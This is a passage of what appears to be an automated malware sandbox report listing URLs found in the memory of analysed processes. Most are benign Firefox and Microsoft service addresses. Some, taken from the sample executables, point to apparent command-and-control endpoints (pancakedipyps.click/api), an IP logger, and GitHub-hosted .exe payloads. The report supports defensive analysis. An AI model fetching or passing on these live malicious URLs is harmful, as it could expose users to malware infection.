                              Source: c9692f9101.exe, 00000014.00000003.3634688996.000000000595F000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3638199431.0000000005671000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3635238092.000000000595F000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3638728492.0000000005612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1Pz8p7
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
                              Source: firefox.exe, 00000030.00000002.3666518929.000002238DF33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3613633704.000002238B620000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3345779688.000002238DF33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3351155955.000002238DF1D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B5CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%schrome://extensions/content/schemas/geckoProfiler.
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3351155955.000002238DF1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%s
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C7B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%sv
                              Source: firefox.exe, 00000030.00000002.3666518929.000002238DF33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3345779688.000002238DF33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3491063189.000002238A382000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3351155955.000002238DF1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%snewChannel
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C7B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://mitmdetection.services.mozilla.com/
                              Source: firefox.exe, 00000030.00000002.3462121451.0000022389EF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3506483524.000002238A6B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/about
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/breach-details/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/dashboard
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/preferences
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mzl.la/3NS9KJd
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
                              Source: powershell.exe, 0000000E.00000002.2643535669.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2706333569.0000000005FA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://oauth.accounts.firefox.com/v1
                              Source: svchost.exe, 00000017.00000003.2851825660.0000019CC52C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                              Source: svchost.exe, 00000017.00000003.2851825660.0000019CC5256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                              Source: firefox.exe, 00000030.00000002.3666518929.000002238DF33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3345779688.000002238DF33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3351155955.000002238DF1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%sresource://gre/modules/handlers/HandlerList.s
                              Source: 85746525a0.exe, 0000000B.00000002.3077006411.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000002.3122907184.00000000032C2000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.3021666980.0000000000BD9000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2997560050.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.3021767203.00000000032C2000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2997644464.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2637084246.00000000032CB000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000002.3079389496.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/
                              Source: 85746525a0.exe, 0000000B.00000003.3021666980.0000000000BD9000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2997560050.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2841686209.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2956641999.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2636831515.00000000032C2000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000002.3079389496.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api
                              Source: 85746525a0.exe, 0000000B.00000003.2841686209.0000000000BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apiOAMIH
                              Source: 85746525a0.exe, 0000000B.00000002.3077006411.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.3021666980.0000000000BD9000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2997560050.0000000000BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apik
                              Source: 85746525a0.exe, 0000000B.00000003.2956641999.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/bu
                              Source: 85746525a0.exe, 0000000B.00000003.2956641999.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/bu8
                              Source: 85746525a0.exe, 0000000B.00000003.2956641999.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/bui
                              Source: 85746525a0.exe, 0000000B.00000003.2841686209.0000000000BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/f
                              Source: 85746525a0.exe, 0000000B.00000003.2636831515.00000000032C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/j
                              Source: 85746525a0.exe, 0000000B.00000003.2583666313.0000000000BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/n
                              Source: 85746525a0.exe, 0000000B.00000003.2956641999.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/pi
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
                              Source: firefox.exe, 00000030.00000002.3666518929.000002238DF33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3345779688.000002238DF33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3491063189.000002238A382000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3351155955.000002238DF1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sCan
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C7B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://profile.accounts.firefox.com/v1
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com/
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com_isRemoteDebuggingEnabledhookProfilerRecordingButtonbound
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.comlocationsForBackgroundTaskNamedregisterModulesProtocolHandler/background
                              Source: 81d22383f9.exe, 0000000C.00000002.2903368169.0000000002474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                              Source: 81d22383f9.exe, 0000000C.00000002.2903368169.0000000002474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/biyjdfjadaw.exe
                              Source: 81d22383f9.exe, 0000000C.00000002.2903368169.0000000002474000.00000004.00000800.00020000.00000000.sdmp, 81d22383f9.exe, 0000000C.00000002.2903368169.0000000002433000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/ktyihkdfesf.exe
                              Source: 81d22383f9.exe, 0000000C.00000002.2903368169.0000000002474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.comD
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://relay.firefox.com/api/v1/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
                              Source: firefox.exe, 00000030.00000002.3462121451.0000022389EF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C7E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com
                              Source: firefox.exe, 00000030.00000003.3312834408.000002238E35A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/internal:privateBrowsingAllowed
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/internal:privateBrowsingAllowedabout-compat/aboutPage.js
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/facebook.svg
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svg
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svgresource://gre/modules/FileUtils.sys.mjsFileUtils_openAtomicF
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B513000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jsC:
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelA
                              Source: 81d22383f9.exe, 0000000C.00000002.2959431174.0000000003497000.00000004.00000800.00020000.00000000.sdmp, 81d22383f9.exe, 0000000C.00000002.2903368169.0000000002470000.00000004.00000800.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000000.2804284012.0000000000423000.00000008.00000001.01000000.00000012.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000000.2804284012.0000000000423000.00000008.00000001.01000000.00000012.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                              Source: 85746525a0.exe, 0000000B.00000003.2612891427.0000000003321000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3121192653.0000000005420000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3241839166.0000000005F65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                              Source: firefox.exe, 00000030.00000002.3462121451.0000022389EF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C7E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/captive-portal
                              Source: ed7d415177.exe, 0000001E.00000003.3379230947.0000000005FE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                              Source: firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
                              Source: ed7d415177.exe, 0000001E.00000003.3379230947.0000000005FE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                              Source: d0e32932f8.exe, 0000001A.00000003.3524238763.000000000B775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.orghttps://truecolors.firefox.combrowser.urlbar.openViewOnFocusbrowser.migra
                              Source: 85746525a0.exe, 0000000B.00000003.2612891427.000000000331F000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2636375625.0000000003318000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2637205234.0000000003318000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2613009119.0000000003318000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2636954929.0000000003318000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3145022320.0000000005419000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3121359650.0000000005419000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3121192653.0000000005420000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000003.3324256499.0000000005510000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3248293209.0000000005F17000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3241839166.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3280368275.0000000005F17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                              Source: 85746525a0.exe, 0000000B.00000003.2613009119.00000000032F3000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3121359650.00000000053F4000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3248293209.0000000005EF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                              Source: 85746525a0.exe, 0000000B.00000003.2612891427.000000000331F000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2636375625.0000000003318000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2637205234.0000000003318000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2613009119.0000000003318000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2636954929.0000000003318000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3145022320.0000000005419000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3121359650.0000000005419000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3121192653.0000000005420000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000003.3324256499.0000000005510000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3248293209.0000000005F17000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3241839166.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3280368275.0000000005F17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                              Source: 85746525a0.exe, 0000000B.00000003.2613009119.00000000032F3000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3121359650.00000000053F4000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3248293209.0000000005EF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
